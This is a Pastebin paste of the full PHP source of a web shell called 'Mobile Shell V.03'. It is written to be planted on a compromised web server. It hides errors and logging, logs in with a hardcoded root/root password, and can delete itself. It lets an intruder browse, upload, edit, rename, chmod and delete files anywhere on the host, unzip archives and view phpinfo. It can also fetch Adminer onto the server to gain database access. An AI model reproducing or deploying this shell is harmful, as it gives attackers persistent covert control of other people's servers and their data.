API tools faq
paste
Advertisement
Guest User

mobile shell v0.3 WILDAN IZZUDIN

a guest
Feb 8th, 2017
210
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 16.02 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2. error_reporting(0);
  3. set_time_limit(0);
  4. @ini_set('error_log', NULL);
  5. @ini_set('log_errors', 0);
  6. @ini_set('max_execution_time', 0);
  7. @ini_set('output_buffering', 0);
  8. @ini_set('display_errors', 0);
  9. $user = "root";
  10. $pass = "root";
  11. function curl($url) {
  12. $curl = curl_init($url);
  13. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  14. curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
  15. curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
  16. //curl_setopt($curl, CURLOPT_SSL_VERIFYHOST, false);
  17. $content = curl_exec($curl);
  18. curl_close($curl);
  19. return $content;
  20. }
  21. @session_start();
  22. $x_us = md5($user);
  23. $x_pa = md5($pass);
  24. $username = $x_us;
  25. $password = $x_pa;
  26. if (isset($_POST['user'])) {
  27. if (md5($_POST['user']) == $username && md5($_POST['pass']) == $password) {
  28. $_SESSION['loginh'] = "1";
  29. }
  30. }
  31. if (isset($_GET['logout'])) {
  32. @session_destroy();
  33. echo '<meta http-equiv="Refresh" content="0; URL=' . $_SERVER['PHP_SELF'] . '"/>';
  34. }
  35. if (isset($_GET['kill'])) {
  36. unlink(__FILE__);
  37. header('location:/');
  38. }
  39. if ($_SESSION['loginh'] == 1) {
  40. if (isset($_GET['info'])) {
  41. die(phpinfo());
  42. }
  43. if (isset($_POST['sessionew'])) {
  44. @session_start();
  45. if ($_SESSION[$_POST['sessionew']] = $_POST['valor']) {
  46. echo "<script>alert('Session created');</
  47. script>";
  48. }
  49. else {
  50. echo "<script>alert('Error');</script>";
  51. }
  52. }
  53. error_reporting(E_ALL ^ E_NOTICE);
  54. error_reporting(E_ALL);
  55. @error_reporting(0);
  56. @ini_set('error_log', NULL);
  57. @ini_set('log_errors', 0);
  58. @ini_set('max_execution_time', 0);
  59. @ini_set('output_buffering', 0);
  60. @ini_set('display_errors', 0);
  61. @set_time_limit(0);
  62. @set_magic_quotes_runtime(0);
  63. @define('VERSION', '2.1');
  64. $x_access_code = "http://scriptcode.xtgem.com";
  65. $x_access_data = "http://xero.esy.es";
  66. $x_css = "<style>.jembut { padding:5px;border-radius:0px;border:1px solid #ddd;margin:auto;}.w2 {
  67. padding:5px;border:1px solid #ddd;margin-top:2px;text-align:center;width:100%;font-
  68.  
  69. weight:bold;margin:auto;}.brudul {border:px solid#303030;background:#222;color:#FFF;font-
  70.  
  71. weight:bold;}.but {border:1px solid#ddd;background:#222;
  72. color:#FFF;font-weight:bold;margin:px; padding:5px}.brudul2 {
  73. border:1px solid#ddd; color:#222; font-weight:bold; padding:5px;}.dan {
  74. padding:3px;border:1px solid red;color:red;
  75. }.suc { padding:3px;border:1px solid green;
  76. color:green;}th { background:#222;color:#FFF;padding:5px; }</style>";
  77. echo '<!DOCTYPE html>
  78. <html lang="en">
  79. <head>
  80. <title>MOBILE SHELL V.03</title>
  81. <meta charset="utf-8"><link rel="shortcut icon" href="' . $x_access_code . '/ico/favicon.ico"/>
  82. <meta name="viewport" content="width=device-width, initial-scale=1">
  83. <link rel="stylesheet" href="' . $x_access_code . '/css/custom.css">
  84. <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/css/bootstrap.min.css">
  85. ' . $x_css . '
  86.  
  87. <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.11.3/jquery.min.js"></script>
  88. <script src="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.5/js/bootstrap.min.js"></script>
  89. </head>
  90. <body>
  91. <div class="container main" role="main">
  92. <div class="w2 brudul" style="margin-bottom:2px">MOBILE SHELL V.03</div>';
  93. $host = 'http://' . $_SERVER['HTTP_HOST'];
  94. echo '<div class="content" style="font-weight:bold"><div class="btn-group btn-group-justified">
  95. <a href="' . $_SERVER['PHP_SELF'] . '" class="btn btn-default" style="background:#222; border-
  96.  
  97. bottom:0px solid red; border-left:0px;border-right:0px;border-top:0px;color:#FFF;font-
  98.  
  99. weight:bold">HOME</a>
  100. <a href="' . $_SERVER['PHP_SELF'] . '?zone" class="btn btn-default"
  101.  
  102. style="background:#222; border-bottom:0px solid red; border-left:1px solid #333;border-
  103.  
  104. right:0px;border-top:0px;color:#FFF;font-weight:bold">MENU</a>
  105. <a href="?logout" class="btn btn-default" style="background:#222; border-bottom:0px
  106.  
  107. solid #222; border-left:1px solid #333;border-right:1px solid #333;border-top:0px;color:#FFF;font-
  108.  
  109. weight:bold"><font color="red"><b>LOGOUT</b></font></a>
  110. <a href="?kill" class="btn btn-default" style="background:#222; border-bottom:0px
  111.  
  112. solid #222; border-left:1px solid #333;border-right:1px solid #333;border-top:0px;color:#FFF;font-
  113.  
  114. weight:bold"><font color="silver"><b>KILL</b></font></a></div>
  115. <div class="brudul2" style="margin-top:2px;margin-bottom:2px;text-align:center;background:#fff">PWD
  116.  
  117. :';
  118. if (isset($_GET['path'])) {
  119. $path = $_GET['path'];
  120. }
  121. else {
  122. $path = getcwd();
  123. }
  124. $path = str_replace('\\', '/', $path);
  125. $paths = explode('/', $path);
  126. foreach($paths as $id => $pat) {
  127. if ($pat == '' && $id == 0) {
  128. $a = true;
  129. echo '/';
  130. continue;
  131. }
  132. if ($pat == '') continue;
  133. echo '<a href="?path=';
  134. for ($i = 0; $i <= $id; $i++) {
  135. echo "$paths[$i]";
  136. if ($i != $id) echo "/";
  137. }
  138. echo '">' . $pat . '</a>/';
  139. }
  140. echo '</div>';
  141. if (isset($_POST['x'])) {
  142. $rse = $_POST['file_name'];
  143. $zip = new ZipArchive;
  144. if ($zip->open($path . '/' . $rse) === TRUE) {
  145. $zip->extractTo($path);
  146. $zip->close();
  147. echo '<script> alert("Extract File Success !!")</script>';
  148. }
  149. else {
  150. echo '<script> alert("Extract File Failed !!")</script>';
  151. }
  152. }
  153. echo '<table width="100%"><tr><td width="80%"><form method="POST" action=""><select name="file_name"
  154.  
  155. class="brudul2" style="width:80%"><option>-- select --</option>';
  156. $scandir = scandir($path);
  157. foreach($scandir as $file) {
  158. if (!is_file("$path/$file")) continue;
  159. echo '<option>' . $file . '</option>';
  160. }
  161. echo '</select></td>
  162. <td align="right">
  163. <input type="submit" value="EXTRACT" class="but" name="x"
  164.  
  165. style=""></center></form></td></tr></table>';
  166. if (isset($_GET['zone'])) {
  167. if ($_POST['menu'] == "adminerphp") {
  168. $rz = 'https://www.adminer.org/static/download/4.2.5/adminer-4.2.5.php';
  169. $fp = fopen("adminer.php", "w");
  170. $x = curl($rz);
  171. fwrite($fp, $x);
  172. fclose($fp);
  173. echo '<meta http-equiv="Refresh" content="0; URL=adminer.php">';
  174. }
  175. echo '<hr><form action="' . $_SERVER['PHP_SELF'] . '?zone" method="post"><table width="100%"><tr><td
  176.  
  177. width="80%"><select name="menu" class="brudul2" style="width:80%">
  178. <option>-- select --</option>
  179. <option value="adminerphp">MySQL</option>
  180. </select></td>
  181. <td align="right">
  182. <input type="submit" value="CREATE" class="but" style=""></center></form></td></tr></table>';
  183. }
  184. echo '<hr>';
  185. if (isset($_FILES['file'])) {
  186. if (copy($_FILES['file']['tmp_name'], $path . '/' . $_FILES['file']['name'])) {
  187. echo '<div class="alert alert-success"><center>Upload Success ^_^ </center></div>';
  188. }
  189. else {
  190. echo '<div class="alert alert-danger"><center>Upload Failed !!</center></div>';
  191. }
  192. }
  193. echo '<center><form enctype="multipart/form-data" method="POST"><input type="file" class="brudul2"
  194.  
  195. name="file" style="width:100%"><input type="submit" class="but" style="width:100%;margin-top:3px"
  196.  
  197. value="&uarr;&uarr;"></form></center>';
  198. if (isset($_GET['filesrc'])) {
  199. echo "<br /><tr><td>Current File : ";
  200. echo '<br /><div class="brudul2" style="margin-top:px;margin-bottom:2px;text-align:center;border:2px
  201.  
  202. solid #279ddd">';
  203. echo $_GET['filesrc'];
  204. echo '</div>';
  205. echo '</tr></td></table><br />';
  206. echo ('<pre>' . htmlspecialchars(file_get_contents($_GET['filesrc'])) . '</pre>');
  207. }
  208. elseif (isset($_GET['option']) && $_POST['opt'] != 'delete') {
  209. echo '</table><br /><center><div class="brudul2" style="margin-top:px;margin-bottom:px;text-
  210.  
  211. align:center;border:2px solid #279ddd"><tt>' . $_POST['path'] . '</tt></div><br /><br />';
  212. if ($_POST['opt'] == 'chmod') {
  213. if (isset($_POST['perm'])) {
  214. if (chmod($_POST['path'], $_POST['perm'])) {
  215. echo '<div class="alert alert-success">Change Permission Done</div>';
  216. }
  217. else {
  218. echo '<div class="alert alert-danger"> Change Permission Error</div>';
  219. }
  220. }
  221. echo '<form method="POST">
  222. Permission : <input name="perm" type="text" class="brudul2" size="4" value="' . substr(sprintf('%o',
  223.  
  224. fileperms($_POST['path'])) , -4) . '" />
  225. <input type="hidden" name="path" value="' . $_POST['path'] . '">
  226. <input type="hidden" name="opt" value="chmod">
  227. <input type="submit" class="but" value="Go" />
  228. </form>';
  229. }
  230. else if ($_POST['opt'] == 'rename') {
  231. if (isset($_POST['newname'])) {
  232. if (rename($_POST['path'], $path . '/' . $_POST['newname'])) {
  233. echo '<div class="alert alert-success"> Change Name Done</div>';
  234. }
  235. else {
  236. echo '<div class="alert alert-danger">Change Name Error </div>';
  237. }
  238. $_POST['name'] = $_POST['newname'];
  239. }
  240. echo '<form method="POST">
  241. New Name : <input name="newname" type="text" class="brudul2" size="20" value="' . $_POST['name'] . '"
  242.  
  243. />
  244. <input type="hidden" name="path" value="' . $_POST['path'] . '">
  245. <input type="hidden" name="opt" value="rename">
  246. <input type="submit" class="but" value="Go" />
  247. </form>';
  248. }
  249. else if ($_POST['opt'] == 'edit') {
  250. if (isset($_POST['src'])) {
  251. $fp = fopen($_POST['path'], 'w');
  252. if (fwrite($fp, $_POST['src'])) {
  253. echo '<div class="alert alert-success">Edit File Done !</div>';
  254. }
  255. else {
  256. echo '<div class="alert alert-danger">Edit File Error ! </div>';
  257. }
  258. fclose($fp);
  259. }
  260. echo '<form method="POST">
  261. <textarea class="form-control brudul2"
  262. rows="20" name="src">' . htmlspecialchars(file_get_contents($_POST['path'])) . '</textarea>
  263. <input type="hidden" name="path" value="' . $_POST['path'] . '">
  264. <input type="hidden" name="opt" value="edit">
  265. <input type="submit" class="but" value="Save !" style="margin-top:3px"/>
  266. </form>';
  267. }
  268. echo '</center>';
  269. }
  270. else {
  271. echo '</table><br /><center>';
  272. if (isset($_GET['option']) && $_POST['opt'] == 'delete') {
  273. if ($_POST['type'] == 'dir') {
  274. if (rmdir($_POST['path'])) {
  275. echo '<div class="alert alert-success"> Delete Dir Done </div>';
  276. }
  277. else {
  278. echo '<div class="alert alert-danger"> Delete Dir Error </div>';
  279. }
  280. }
  281. elseif ($_POST['type'] == 'file') {
  282. if (unlink($_POST['path'])) {
  283. echo '<div class="alert alert-success"> Delete File Done </div>';
  284. }
  285. else {
  286. echo '<div class="alert alert-danger"> Delete File Error </div>';
  287. }
  288. }
  289. }
  290. echo '</center>';
  291. $scandir = scandir($path);
  292. echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="">
  293. <tr class="first">
  294. <th><center>Name </center></th>
  295. <th><center>Size </center></th>
  296. <th><center>Options </center></th>
  297. </tr>';
  298. foreach($scandir as $dir) {
  299. if (!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue;
  300. echo "<tr>
  301. <td><img src='data:image/png;base64, R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI
  302.  
  303. +ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA'> <font color='#222'> <a href=\"?path=
  304.  
  305. $path/$dir\">[ $dir ]</a></td>
  306. <td><center><font color='#222'>
  307. --</font></center></font></td>";
  308. echo "<td style=text-align:right><form method=\"POST\" action=\"?option&path=$path\">
  309. <select name=\"opt\" class=\"but\">
  310. <option value=\"\"></option>
  311. <option value=\"delete\">D</option>
  312. <option value=\"chmod\">C</option>
  313. <option value=\"rename\">R</option>
  314. </select>
  315. <input type=\"hidden\" name=\"type\" value=\"dir\">
  316. <input type=\"hidden\" name=\"name\" value=\"$dir\">
  317. <input type=\"hidden\" name=\"path\" value=\"$path/$dir\">
  318. <input type=\"submit\" class=\"but\" value=\">\" />
  319. </form></center></td>
  320. </tr>";
  321. }
  322. foreach($scandir as $file) {
  323. if (!is_file("$path/$file")) continue;
  324. $size = filesize("$path/$file") / 1024;
  325. $size = round($size, 3);
  326. if ($size >= 1024) {
  327. $size = round($size / 1024, 2) . ' MB';
  328. }
  329. else {
  330. $size = $size . ' KB';
  331. }
  332. echo "<tr>
  333. <td><img
  334.  
  335. src='data:image/png;base64,R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSv
  336.  
  337. CA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA'> <font color='green'> <a href=\"?filesrc=$path/
  338.  
  339. $file&path=$path\">$file</a></td>
  340. <td><center><font color='#222'>" . $size . "</font></center></td></font><center>";
  341. echo "
  342. <td style=text-align:right><form method=\"POST\" action=\"?option&path=$path\">
  343. <select name=\"opt\" class=\"but\">
  344. <option value=\"\"></option>
  345. <option value=\"delete\">D</option>
  346. <option value=\"chmod\">C</option>
  347. <option value=\"rename\">R</option>
  348. <option value=\"edit\">E</option>
  349. </select>
  350. <input type=\"hidden\" name=\"type\" value=\"file\">
  351. <input type=\"hidden\" name=\"name\" value=\"$file\">
  352. <input type=\"hidden\" name=\"path\" value=\"$path/$file\">
  353. <input type=\"submit\" class=\"but\" value=\">\" />
  354. </form></center></td>
  355. </tr>";
  356. }
  357. echo '</table></div>';
  358. }
  359. echo '</div>';
  360. echo '<div class="content" style="margin-top:2px;font-weight:bold"><center><form action=""
  361.  
  362. method="post">
  363. <input type="text" class="brudul2" name="kata" value="" style="margin-right:px" size="27">
  364. <input type="submit" class="but" name="ndir" value="ND">
  365. <input type="submit" class="but" name="nfil" value="NF"></form></center></div>';
  366. if (isset($_POST['ndir'])) {
  367. $dir = $_POST['kata2'];
  368. $fold = $_POST['kata'];
  369. $cdir = $_POST['kata'];
  370. if (is_dir($path . '/' . $cdir)) {
  371. echo '<script>alert("Directory Already Exist");</script>';
  372. }
  373. else {
  374. if (mkdir($path . '/' . $cdir, 0777)) {
  375. echo '<script>alert("Directory Created ^_^");</script><meta http-equiv="Refresh" content="0;
  376.  
  377. URL=?path=' . $path . '"/>';
  378. }
  379. else {
  380. echo '<script>alert("Directory Was Not Created !!");</script>';
  381. }
  382. }
  383. }
  384. if (isset($_POST['nfil'])) {
  385. $cfile = $_POST['kata'];
  386. if (file_exists($path . '/' . $cfile)) {
  387. echo '<script>alert("File Already Exist !!");</script>';
  388. }
  389. else {
  390. if (fopen($path . '/' . $cfile, "w+")) {
  391. echo '<script>alert("Newfile Created ^_^");</script><meta http-equiv="Refresh" content="0; URL=?
  392.  
  393. path=' . $path . '"/>';
  394. }
  395. else {
  396. echo '<script>alert("Newfile Was Not Created !!");</script>';
  397. }
  398. }
  399. }
  400. echo '<div class="w2 brudul" style="margin-top:2px">CODER BY WILDAN IZZUDIN</div>';
  401. function perms($file)
  402. {
  403. $perms = fileperms($file);
  404. if (($perms & 0xC000) == 0xC000) {
  405. $info = 's';
  406. }
  407. elseif (($perms & 0xA000) == 0xA000) {
  408. $info = 'l';
  409. }
  410. elseif (($perms & 0x8000) == 0x8000) {
  411. $info = '-';
  412. }
  413. elseif (($perms & 0x6000) == 0x6000) {
  414. $info = 'b';
  415. }
  416. elseif (($perms & 0x4000) == 0x4000) {
  417. $info = 'd';
  418. }
  419. elseif (($perms & 0x2000) == 0x2000) {
  420. $info = 'c';
  421. }
  422. elseif (($perms & 0x1000) == 0x1000) {
  423. $info = 'p';
  424. }
  425. else {
  426. $info = 'u';
  427. }
  428. $info.= (($perms & 0x0100) ? 'r' : '-');
  429. $info.= (($perms & 0x0080) ? 'w' : '-');
  430. $info.= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x') : (($perms & 0x0800) ? 'S' : '-'));
  431. $info.= (($perms & 0x0020) ? 'r' : '-');
  432. $info.= (($perms & 0x0010) ? 'w' : '-');
  433. $info.= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x') : (($perms & 0x0400) ? 'S' : '-'));
  434. $info.= (($perms & 0x0004) ? 'r' : '-');
  435. $info.= (($perms & 0x0002) ? 'w' : '-');
  436. $info.= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x') : (($perms & 0x0200) ? 'T' : '-'));
  437. return $info;
  438. }
  439. }
  440. else {
  441. echo '
  442. <title>LOGIN PANEL | MOBILE SHELL V.03</title><link rel="shortcut icon"
  443.  
  444. href="http://scriptcode.xtgem.com/ico/favicon.ico"/>
  445. <meta name="viewport" content="width=
  446. device-width, initial-scale=1">
  447. <link rel="stylesheet" href="http://scriptcode.xtgem.com/css/custom.css">
  448. <link rel="stylesheet" href="http://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
  449. <body>
  450. <div class="container main" role="main" style="witdh:300px"><div class="content">
  451. <div class="alert alert-warning"><center>
  452. Apache Server at ' . $_SERVER['HTTP_HOST'] . ' Port 80</center></div>
  453. <form id="login" action="" method="POST">
  454. <div class="form-group">
  455. <div class="input-group">
  456. <div class="input-group-addon">Username</div>
  457. <input type="text" class="form-control" name="user">
  458. </div></div>
  459. <div class="form-group">
  460. <div class="input-group">
  461. <div class="input-group-addon">Password</div>
  462. <input type="password" class="form-control" name="pass">
  463. </div></div>
  464. <input type="submit" class="btn btn-warning" value="Login &rarr;">
  465. </form>
  466. </div>
  467. </div>
  468. </div>';
  469. }
  470. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!